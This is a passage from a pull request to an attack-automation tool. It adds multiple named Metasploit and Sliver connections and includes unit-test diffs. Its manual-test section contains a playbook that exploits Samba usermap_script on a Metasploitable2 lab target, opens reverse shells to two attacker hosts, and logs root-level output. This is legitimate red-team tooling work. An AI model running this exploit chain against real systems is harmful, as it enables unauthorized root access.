+        cmd = SliverSessionSimpleCommand(type='sliver-session', cmd='pwd', session='s', connection='sliver2')
+        assert executor._resolve_connection(cmd) == 'sliver2'
+
+    def test_session_executor_raises_with_no_config(self, pm, varstore):
+        executor = SliverSessionExecutor(pm, varstore=varstore, sliver_config={})
+        cmd = SliverSessionSimpleCommand(type='sliver-session', cmd='pwd', session='s')
+        with pytest.raises(ExecException, match='No Sliver connections configured'):
+            executor._resolve_connection(cmd)

--- a/test/units/test_sliverexecutor.py
+++ b/test/units/test_sliverexecutor.py
@@ -8,12 +8,9 @@ from sliver.protobuf import client_pb2
 
 @pytest.fixture
 def setup_executor():
-    # Mock dependencies and create a SliverExecutor instance
     pm = MagicMock()  # Mock ProcessManager
     varstore = MagicMock()  # Mock VariableStore
-    sliver_config = MagicMock()  # Mock SliverConfig
-    sliver_config.config_file = None
-    executor = SliverExecutor(pm, varstore=varstore, sliver_config=sliver_config)
+    executor = SliverExecutor(pm, varstore=varstore, sliver_config={})
     return executor
 
 


### PR DESCRIPTION
# Task
#175 

also fixes #190 

# Description
Extend msf_config and sliver_config to support multiple named connections (matching existing bettercap_config/remote_config pattern).
Each command accepts an optional connection field; if not specified first configured connection is used.
**Backwards compatibility:** Single-connection configs (old format) are automatically migrated to a named `default `entry with Pydantic field_validator(mode='before'), --> existing playbooks and configs require no changes.

**Changes:**
- MsfConfig/SliverConfig now stored as Dict[str, Config] 
- MsfClientMixin / SliverClientMixin extracted for  client resolution and per-connection caching
- connection field added to all msf and Sliver command schemas
- Unit tests 
- Docs updated for msf_config, sliver_config and respective command types
- Scoped MsfSessionStore by connection name

# How Has This Been Tested?
  - test_multi_connections_config.py for  config schema migration (old flat format → named default)
  - test_msfclientmixin.py for  resolving connection and getting client for all three msf executors 
  - test_sliverclientmixin.py

manual test with two attacker and one target (Metasploitable2)
playbook:
```
  ⎿ #
     # Manual test: multiple MSF connections against Metasploitable2 (192.43.0.25)
     #
     # Run with:
     #   uv run attackmate --config config.yml test.yml
     #
     # What this tests:
     #   - Commands without 'connection' field route to primary (192.43.0.188)
     #   - Commands with 'connection: secondary' route to 192.43.0.16
     #   - Sessions are scoped per connection (shell_primary is invisible to secondary)
     #   - RESULT_STDOUT reflects output from the correct session on each connection

     vars:
       TARGET: 192.43.0.25
       LHOST_PRIMARY: 192.43.0.188
       LHOST_SECONDARY: 192.43.0.16

     commands:

       # -----------------------------------------------------------------------
       # PRIMARY connection: usermap_script, reverse shell back to 192.43.0.188
       # No 'connection' field — must use first configured entry (primary).
       # -----------------------------------------------------------------------

       - type: debug
         cmd: "=== PRIMARY: exploiting Samba usermap_script on $TARGET ==="

       - type: msf-module
         cmd: exploit/multi/samba/usermap_script
         creates_session: shell_primary
         options:
           RHOSTS: $TARGET
           RPORT: "139"
         payload: cmd/unix/reverse
         payload_options:
           LHOST: $LHOST_PRIMARY
           LPORT: "4444"
         # no 'connection' — routes to primary

       - type: debug
         cmd: "PRIMARY session obtained"

       - type: msf-session
         cmd: id
         session: shell_primary
         # no 'connection' — routes to primary

       - type: debug
         cmd: "PRIMARY id: $RESULT_STDOUT"

       - type: msf-session
         cmd: uname -a
         session: shell_primary

       - type: debug
         cmd: "PRIMARY uname: $RESULT_STDOUT"

       # -----------------------------------------------------------------------
       # SECONDARY connection: usermap_script, reverse shell back to 192.43.0.16
       # Explicit 'connection: secondary' — must route to 192.43.0.16.
       # -----------------------------------------------------------------------

       - type: debug
         cmd: "=== SECONDARY: exploiting Samba usermap_script on $TARGET ==="

       - type: msf-module
         cmd: exploit/multi/samba/usermap_script
         creates_session: shell_secondary
         options:
           RHOSTS: $TARGET
           RPORT: "139"
         payload: cmd/unix/reverse
         payload_options:
           LHOST: $LHOST_SECONDARY
           LPORT: "4444"
         connection: secondary

       - type: debug
         cmd: "SECONDARY session obtained"

       - type: msf-session
         cmd: id
         session: shell_secondary
         connection: secondary

       - type: debug
         cmd: "SECONDARY id: $RESULT_STDOUT"

       - type: msf-session
         cmd: uname -a
         session: shell_secondary
         connection: secondary

       - type: debug
         cmd: "SECONDARY uname: $RESULT_STDOUT"

       # -----------------------------------------------------------------------
       # Cross-connection isolation: run on shell_primary again via primary.
       # Confirms session stores are scoped per connection.
       # -----------------------------------------------------------------------

       - type: debug
         cmd: "=== Cross-connection isolation: shell_primary still reachable on primary ==="

       - type: msf-session
         cmd: hostname
         session: shell_primary
         # no 'connection' — primary only

       - type: debug
         cmd: "PRIMARY hostname: $RESULT_STDOUT"

       - type: debug
         cmd: "=== All checks complete ==="

```

Output:
```
attacker@attacker1:~$ cat output.log 
--- 2026-06-10 08:06:37 INFO: ---

Command: === PRIMARY: exploiting Samba usermap_script on 192.43.0.25 ===
Debug: '=== PRIMARY: exploiting Samba usermap_script on 192.43.0.25 ==='
--- 2026-06-10 08:07:11 INFO: ---

Command: exploit/multi/samba/usermap_script

--- 2026-06-10 08:07:11 INFO: ---

Command: PRIMARY session obtained
Debug: 'PRIMARY session obtained'
--- 2026-06-10 08:07:13 INFO: ---

Command: id
uid=0(root) gid=0(root)

--- 2026-06-10 08:07:13 INFO: ---

Command: PRIMARY id: uid=0(root) gid=0(root)

Debug: 'PRIMARY id: uid=0(root) gid=0(root)
'
--- 2026-06-10 08:07:16 INFO: ---

Command: uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

--- 2026-06-10 08:07:16 INFO: ---

Command: PRIMARY uname: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Debug: 'PRIMARY uname: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
'
--- 2026-06-10 08:07:16 INFO: ---

Command: === SECONDARY: exploiting Samba usermap_script on 192.43.0.25 ===
Debug: '=== SECONDARY: exploiting Samba usermap_script on 192.43.0.25 ==='
--- 2026-06-10 08:07:49 INFO: ---

Command: exploit/multi/samba/usermap_script

--- 2026-06-10 08:07:49 INFO: ---

Command: SECONDARY session obtained
Debug: 'SECONDARY session obtained'
--- 2026-06-10 08:07:52 INFO: ---

Command: id
uid=0(root) gid=0(root)

--- 2026-06-10 08:07:52 INFO: ---

Command: SECONDARY id: uid=0(root) gid=0(root)

Debug: 'SECONDARY id: uid=0(root) gid=0(root)
'
--- 2026-06-10 08:07:55 INFO: ---

Command: uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

--- 2026-06-10 08:07:55 INFO: ---

Command: SECONDARY uname: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Debug: 'SECONDARY uname: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
'
--- 2026-06-10 08:07:55 INFO: ---

Command: === Cross-connection isolation: shell_primary still reachable on primary ===
Debug: '=== Cross-connection isolation: shell_primary still reachable on primary ==='
--- 2026-06-10 08:07:58 INFO: ---

Command: hostname
metasploitable

--- 2026-06-10 08:07:58 INFO: ---

Command: PRIMARY hostname: metasploitable

Debug: 'PRIMARY hostname: metasploitable
'
--- 2026-06-10 08:07:58 INFO: ---

Command: === All checks complete ===
Debug: '=== All checks complete ==='


```





# Checklist
<!-- Go over all the following points, and put an `x` in all the boxes that apply -->

- [x] This Pull-Request goes to the **development** branch.
- [x] I have successfully run prek locally.
- [x] I have added tests to cover my changes.
- [x] I have linked the issue-id to the task-description.
- [x] I have performed a self-review of my own code.
